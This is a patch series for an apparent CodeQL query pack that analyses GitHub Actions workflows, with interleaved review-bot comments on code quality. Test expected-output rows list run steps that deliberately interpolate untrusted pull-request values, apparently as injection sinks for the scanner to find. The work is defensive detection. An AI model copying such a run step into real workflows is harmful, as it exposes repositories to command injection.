+++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -18,34 +18,34 @@ import actions /** * An If node that contains an `actor` check */ -class ActorCheckStmt extends IfStmt { - ActorCheckStmt() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } +class ActorCheck extends If { + ActorCheck() { this.getCondition().regexpMatch(".*github\\.(triggering_)?actor.*") } } /** * An If node that contains a `label` check */ -class LabelCheckStmt extends IfStmt { - LabelCheckStmt() { +class LabelCheck extends If { + LabelCheck() { this.getCondition().regexpMatch(".*github\\.event\\.pull_request\\.labels.*") or this.getCondition().regexpMatch(".*github\\.event\\.label\\.name.*") } } -from WorkflowStmt w, JobStmt job, StepUsesExpr checkoutStep +from Workflow w, Job job, StepUses checkoutStep where w.hasTriggerEvent("pull_request_target") and - w.getAJobStmt() = job and - job.getAStepStmt() = checkoutStep and + w.getAJob() = job and + job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep .getArgumentExpr("ref") - .(ExprAccessExpr) + .(Expression) .getExpression() .matches([ "%github.event.pull_request.head.ref%", "%github.event.pull_request.head.sha%", "%github.event.pull_request.number%", "%github.event.number%", "%github.head_ref%" ]) and - not exists(ActorCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) and - not exists(LabelCheckStmt check | job.getIfStmt() = check or checkoutStep.getIfStmt() = check) + not exists(ActorCheck check | job.getIf() = check or checkoutStep.getIf() = check) and + not exists(LabelCheck check | job.getIf() = check or checkoutStep.getIf() = check) select checkoutStep, "Potential unsafe checkout of untrusted pull request on 'pull_request_target'." diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index 4007e6454ea..ffbbed2bac1 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -90,18 +90,11 @@ stepUsesNodes | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | jobUsesNodes usesSteps -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | fetch-depth | .github/workflows/test.yml:13:24:13:24 | 0 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | find | .github/workflows/test.yml:24:17:24:21 | "foo" | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | replace | .github/workflows/test.yml:25:20:25:21 | "" | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -runSteps1 +runSteps | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | -runSteps2 -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | runStepChildren | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | 
@@ -115,21 +108,6 @@ runStepChildren | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -varAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | needs.job1.outputs.job_output | -orphanVarAccesses -nonOrphanVarAccesses -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | steps.step.outputs.value | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | steps.source.outputs.all_changed_files | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | github.event.pull_request.head.ref | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | always() | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | needs.job1.outputs.job_output | .github/workflows/test.yml:39:9:40:53 | id: sink | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -200,6 +178,8 @@ parentNodes | .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | cfgNodes +dfNodes +exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | 
@@ -218,44 +198,15 @@ cfgNodes | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | | .github/workflows/test.yml:39:9:40:53 | id: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -dfNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | -exprNodes -| .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... 
-latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | step | nodeLocations +| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | +| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 168987284c3..7524e31f050 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -9,49 +9,39 @@ query predicate files(File f) { any() } query predicate yamlNodes(YamlNode n) { any() } -query predicate jobNodes(JobStmt s) { any() } +query predicate jobNodes(Job s) { any() } -query predicate stepNodes(StepStmt s) { any() } +query predicate stepNodes(Step s) { any() } -query predicate allUsesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(Uses s) { any() } -query predicate stepUsesNodes(StepUsesExpr s) { any() } +query predicate stepUsesNodes(StepUses s) { any() } -query predicate jobUsesNodes(JobUsesExpr s) { any() } +query predicate jobUsesNodes(JobUses s) { any() } -query predicate usesSteps(UsesExpr call, string argname, Expression arg) { +query predicate usesSteps(Uses call, string argname, Expression arg) { call.getArgumentExpr(argname) = arg } -query predicate runSteps1(RunExpr run, string body) { run.getScript() = body } +query predicate runSteps(Run run, string body) { run.getScript() = body } -query predicate runSteps2(RunExpr run, Expression bodyExpr) { run.getScriptExpr() = bodyExpr } - -query predicate runStepChildren(RunExpr run, AstNode child) { child.getParentNode() = run } - -query predicate varAccesses(ExprAccessExpr ea, string expr) { expr = ea.getExpression() } - -query predicate orphanVarAccesses(ExprAccessExpr va, string var) { - var = va.getExpression() and - not exists(AstNode n | n = va.getParentNode()) -} - -query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode parent) { - var = va.getExpression() and - parent = va.getParentNode() -} +query predicate runStepChildren(Run run, AstNode child) { child.getParentNode() = run } query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + n.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + 
e.getLocation().getFile().getBaseName() = "argus_case_study.yml" +} //any() } -query predicate exprNodes(DataFlow::ExprNode e) { any() } +query predicate exprNodes(DataFlow::Node e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUses s, string a) { s.getId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } @@ -67,4 +57,4 @@ query predicate summaries(string action, string version, string input, string ou query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } -query predicate needs(DataFlow::ExprNode e) { e.asExpr() instanceof NeedsCtxAccessExpr } +query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } From bcf308125912d17d3ab7460191948be90b292f44 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 1 Mar 2024 11:17:23 +0100 Subject: [PATCH 0082/1267] Refactor Input/Outpts --- ql/lib/codeql/actions/Ast.qll | 129 ++++++++++-------- .../actions/controlflow/internal/Cfg.qll | 38 ++---- .../codeql/actions/dataflow/FlowSources.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 11 +- .../dataflow/internal/DataFlowPublic.qll | 11 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 4 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 4 +- ql/test/library-tests/test.ql | 8 +- 12 files changed, 108 insertions(+), 107 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 881daf13336..cb561fdf8d1 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
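Review bot: In ql/test/library-tests/test.ql (hunk `@@ -9,49 +9,39 @@`), `cfgNodes` and `dfNodes` are now filtered to `getBaseName() = "argus_case_study.yml"`, while every row in test.expected comes from `.github/workflows/test.yml`. Both predicates therefore return nothing, and the expected file records them as empty sections, so the CFG and data-flow node listings no longer guard against regressions. This reads like a debugging filter committed by accident. Restore `query predicate cfgNodes(Cfg::Node n) { any() }` and `query predicate dfNodes(DataFlow::Node e) { any() }`, drop the trailing `//any() }` fragments, and regenerate test.expected.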
@@ -2,7 +2,7 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations /** - * Base class for thejAST tree. Based on YamlNode from the Yaml library. + * Base class for the AST tree. Based on YamlNode from the Yaml library. */ class AstNode instanceof YamlNode { AstNode getParentNode() { result = super.getParentNode() } @@ -23,7 +23,7 @@ class AstNode instanceof YamlNode { /** * Gets a environment variable expression by name in the scope of the current node. */ - EnvExpr getEnvExpr(string name) { + Expression getEnvExpr(string name) { exists(Actions::Env env | env.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) | @@ -42,9 +42,18 @@ class AstNode instanceof YamlNode { class CompositeAction extends AstNode instanceof Actions::CompositeAction { Runs getRuns() { result = super.getRuns() } - Inputs getInputs() { result = this.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = this.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + this.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } class Runs extends AstNode instanceof Actions::Runs { 
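Review bot: `CompositeAction.getAnInput()` and `getInput(string name)` each spell out the same `lookup("inputs").(YamlMapping).maps(result, _)` walk. The same duplication appears in `ReusableWorkflow` and in `Outputs.getAnOutputExpr()` / `getOutputExpr(name)` in the following hunks. For outputs the any-variant can simply delegate: `Expression getAnOutputExpr() { result = this.getOutputExpr(_) }`. The input pair could delegate the same way only if every input key is a `YamlString`, which is not visible here. The new public predicates also have no QLDoc; a one-line `/** Gets the input with the given name declared under the inputs key. */` style comment on each would match the rest of the file.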
@@ -81,23 +90,24 @@ class ReusableWorkflow extends Workflow { ReusableWorkflow() { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - Inputs getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + + Expression getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + + Expression getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + + Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + + Input getInput(string name) { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and + result.(YamlString).getValue() = name + } } -class Inputs extends AstNode instanceof YamlMapping { +class Input extends AstNode { YamlMapping parent; - Inputs() { parent.lookup("inputs") = this } - - /** - * Gets a specific input expression (YamlMapping) by name. - */ - InputExpr getInputExpr(string name) { - result.(YamlString).getValue() = name and - this.(YamlMapping).maps(result, _) - } + Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } } class Outputs extends AstNode instanceof YamlMapping { @@ -106,9 +116,17 @@ class Outputs extends AstNode instanceof YamlMapping { Outputs() { parent.lookup("outputs") = this } /** - * Gets a specific output expression (YamlMapping) by name. + * Gets an output expression. */ - OutputExpr getOutputExpr(string name) { + Expression getAnOutputExpr() { + this.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(_) = result + } + + /** + * Gets a specific output expression by name. + */ + Expression getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or this.(YamlMapping).lookup(name) = result } 
@@ -130,7 +148,7 @@ class Strategy extends AstNode instanceof YamlMapping { /** * Gets a specific matric expression (YamlMapping) by name. */ - MatrixVariableExpr getMatrixVariableExpr(string name) { + Expression getMatrixVariableExpr(string name) { this.(YamlMapping).lookup("matrix").(YamlMapping).lookup(name) = result } 
@@ -318,41 +336,40 @@ class Run extends Step { string getScript() { result = scriptExpr.getValue() } } -/** - * An AST node associated with a Reusable Workflow input. - */ -class InputExpr extends AstNode { - InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } -} - -/** - * An AST node holding an Env var value. - */ -class EnvExpr extends AstNode { - EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } -} - -/** - * An AST node holding a job or workflow output var. - */ -class OutputExpr extends AstNode { - OutputExpr() { - exists(Outputs outputs | - outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or - outputs.(YamlMapping).lookup(_) = this - ) - } -} - -/** - * An AST node holding a matrix var. - */ -class MatrixVariableExpr extends AstNode { - MatrixVariableExpr() { - exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) - } -} - +// /** +// * An AST node associated with a Reusable Workflow input. +// */ +// class InputExpr extends AstNode { +// InputExpr() { exists(Inputs inputs | inputs.(YamlMapping).maps(this, _)) } +// } +// +// /** +// * An AST node holding an Env var value. +// */ +// class EnvExpr extends AstNode { +// EnvExpr() { exists(Actions::Env env | env.(YamlMapping).lookup(_) = this) } +// } +// +// /** +// * An AST node holding a job or workflow output var. +// */ +// class OutputExpr extends AstNode { +// OutputExpr() { +// exists(Outputs outputs | +// outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or +// outputs.(YamlMapping).lookup(_) = this +// ) +// } +// } +// +// /** +// * An AST node holding a matrix var. +// */ +// class MatrixVariableExpr extends AstNode { +// MatrixVariableExpr() { +// exists(Strategy outputs | outputs.(YamlMapping).lookup("matrix").(YamlMapping).lookup(_) = this) +// } +// } /** * Evaluation of a workflow expression ${{}}. */ 
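Review bot: The removed classes `InputExpr`, `EnvExpr`, `OutputExpr` and `MatrixVariableExpr` are kept as a `//` block instead of being deleted, and the matching leaf trees in controlflow/internal/Cfg.qll are commented out the same way further down. Version control already preserves the old definitions. Deleting the block keeps Ast.qll readable and avoids dead text sitting directly above the QLDoc for the workflow-expression class. If the bodies are kept on purpose until the refactor settles, a single `// TODO: remove once Input/Outputs refactor is complete` line would say so more clearly than the full commented-out source.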
@@ -508,9 +525,9 @@ class InputsExpression extends ContextExpression {
 override AstNode getTarget() {
 result.getLocation().getFile() = this.getLocation().getFile() and
 (
- exists(ReusableWorkflow w | w.getInputs().getInputExpr(fieldName) = result)
+ exists(ReusableWorkflow w | w.getInput(fieldName) = result)
 or
- exists(CompositeAction a | a.getInputs().getInputExpr(fieldName) = result)
+ exists(CompositeAction a | a.getInput(fieldName) = result)
 )
 }
 }
diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
index 2bc86723493..661544dfed2 100644
--- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
+++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll
@@ -148,8 +148,8 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos
 result =
 rank[i](AstNode child, Location l |
 (
- child = this.(CompositeAction).getInputs() or
- child = this.(CompositeAction).getOutputs() or
+ child = this.(CompositeAction).getAnInput() or
+ child = this.(CompositeAction).getAnOutputExpr() or
 child = this.(CompositeAction).getRuns()
 ) and
 l = child.getLocation()
@@ -172,10 +172,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow {
 result =
 rank[i](AstNode child, Location l |
 (
- child = this.(ReusableWorkflow).getInputs() or
- child = this.(ReusableWorkflow).getOutputs() or
- child = this.(ReusableWorkflow).getStrategy() or
- child = this.(ReusableWorkflow).getAJob()
+ child = this.(ReusableWorkflow).getAJob() or
+ child = this.(ReusableWorkflow).getAnInput() or
+ child = this.(ReusableWorkflow).getAnOutputExpr() or
+ child = this.(ReusableWorkflow).getStrategy()
 ) and
 l = child.getLocation()
 |
@@ -199,19 +199,6 @@ private class WorkflowTree extends StandardPreOrderTree instanceof Workflow {
 }
 }
-private class InputsTree extends StandardPreOrderTree instanceof Inputs {
- override ControlFlowTree getChildNode(int i) {
- result =
- rank[i](AstNode child, Location l |
- child = super.getInputExpr(_) and l = child.getLocation()
- |
- child
- order by
- l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString()
- )
- }
-}
-
 private class OutputsTree extends StandardPreOrderTree instanceof Outputs {
 override ControlFlowTree getChildNode(int i) {
 result =
@@ -287,14 +274,13 @@ private class RunTree extends StandardPreOrderTree instanceof Run {
 private class UsesLeaf extends LeafTree instanceof Uses { }
-private class InputExprTree extends LeafTree instanceof InputExpr { }
-
-private class OutputExprTree extends LeafTree instanceof OutputExpr { }
-
-private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { }
-
-private class EnvExprTree extends LeafTree instanceof EnvExpr { }
+private class InputTree extends LeafTree instanceof Input { }
+// private class OutputExprTree extends LeafTree instanceof OutputExpr { }
+//
+// private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { }
+//
+// private class EnvExprTree extends LeafTree instanceof EnvExpr { }
 private class ExprAccessTree extends LeafTree instanceof ContextExpression { }
 private class AstNodeLeaf extends LeafTree instanceof Expression { }
diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll
index c30c963afdb..32d37efdaae 100644
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll
+++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll
@@ -160,7 +160,7 @@ private class ExternallyDefinedSource extends RemoteFlowSource {
 private class CompositeActionInputSource extends RemoteFlowSource {
 CompositeAction c;
- CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() }
+ CompositeActionInputSource() { c.getAnInput() = this.asExpr() }
 override string getSourceType() { result = "Composite action input" }
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
index 62975959b39..d99db775d61 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll
@@ -54,8 +54,13 @@ DataFlowType getNodeType(Node node) { any() }
 predicate nodeIsHidden(Node node) { none() }
 class DataFlowExpr extends Cfg::Node {
- DataFlowExpr() { any() }
- //DataFlowExpr() { this.getAstNode() instanceof Expression }
+ DataFlowExpr() {
+ this.getAstNode() instanceof Expression or
+ this.getAstNode() instanceof Uses or
+ this.getAstNode() instanceof Run or
+ this.getAstNode() instanceof Outputs or
+ this.getAstNode() instanceof Input
+ }
 }
 /**
@@ -150,7 +155,7 @@ ContentApprox getContentApprox(Content c) { result = c }
 * Made a string to match the ArgumentPosition type.
 */
 class ParameterPosition extends string {
- ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) }
+ ParameterPosition() { exists(any(ReusableWorkflow w).getInput(this)) }
 }
 /**
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
index a8434cdb603..dbae273151b 100644
--- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
+++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll
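Review bot: In DataFlowPrivate.qll, `DataFlowExpr` goes from `any()` to a fixed list of five AST kinds with no comment saying why these five. An AST kind that is left out simply stops having a data-flow node, so the taint queries built on it report fewer results without any error. A QLDoc comment on the class would make the contract explicit, for example `/** A CFG node that can carry data flow: an Expression, a Uses or Run step, an Outputs mapping, or an Input. */`. The hunks shown do not tell me whether env values and matrix variables are all covered by `Expression`. A predicate in test.ql that lists the sources and sinks of the CWE-094 queries as `DataFlow::Node`s would show a missing disjunct in the expected output.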
@@ -48,22 +48,19 @@ class ExprNode extends Node, TExprNode {
 * Reusable workflow input nodes
 */
 class ParameterNode extends ExprNode {
- private InputExpr input;
+ private Input input;
- ParameterNode() {
- this.asExpr() = input and
- input = any(Inputs s).getInputExpr(_)
- }
+ ParameterNode() { this.asExpr() = input }
 predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) {
- input = c.(ReusableWorkflow).getInputs().getInputExpr(pos)
+ input = c.(ReusableWorkflow).getInput(pos)
 }
 override string toString() { result = "input " + input.toString() }
 override Location getLocation() { result = input.getLocation() }
- InputExpr getInputExpr() { result = input }
+ Input getInput() { result = input }
 }
 /**
diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
index 5bff6abc7bb..4b78f275382 100644
--- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql
+++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql
@@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node {
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
- exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr())
+ exists(CompositeAction c | c.getAnInput() = source.asExpr())
 }
 predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql
index 12703a6cff2..0edeb0a7ec8 100644
--- a/ql/src/Security/CWE-020/CompositeActionsSources.ql
+++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql
@@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig {
 }
 predicate isSink(DataFlow::Node sink) {
- exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr())
+ exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr())
 }
 predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) {
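Review bot: In DataFlowPublic.qll the QLDoc above `ParameterNode` still reads "Reusable workflow input nodes", but the new characteristic predicate `ParameterNode() { this.asExpr() = input }` accepts every `Input`. Judging by `CompositeAction.getAnInput()` used elsewhere in this commit, that presumably includes composite-action inputs. `isParameterOf` only binds through `c.(ReusableWorkflow)`, so those nodes would be parameters of no callable. Either document that, e.g. `* A workflow or composite action input; only reusable-workflow inputs are parameters of a callable.`, or narrow the class to match the comment. The comment's opening `/**` sits above the hunk.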
diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql
index e5933a73b36..59a05f64b6c 100644
--- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql
+++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql
@@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
- exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr())
+ exists(CompositeAction c | c.getAnInput() = source.asExpr())
 }
 predicate isSink(DataFlow::Node sink) {
- exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr())
+ exists(CompositeAction c | c.getAnOutputExpr() = sink.asExpr())
 }
 }
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
index 1e1f942b200..28ff074fd96 100644
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
+++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql
@@ -25,7 +25,7 @@ private class ExpressionInjectionSink extends DataFlow::Node {
 private module MyConfig implements DataFlow::ConfigSig {
 predicate isSource(DataFlow::Node source) {
- exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr())
+ exists(ReusableWorkflow w | w.getAnInput() = source.asExpr())
 }
 predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink }
diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql
index 7bcea3d45b0..6e88f36fece 100644
--- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql
+++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql
@@ -24,7 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig {
 }
 predicate isSink(DataFlow::Node sink) {
- exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr())
+ exists(ReusableWorkflow w | w.getAnOutputExpr() = sink.asExpr())
 }
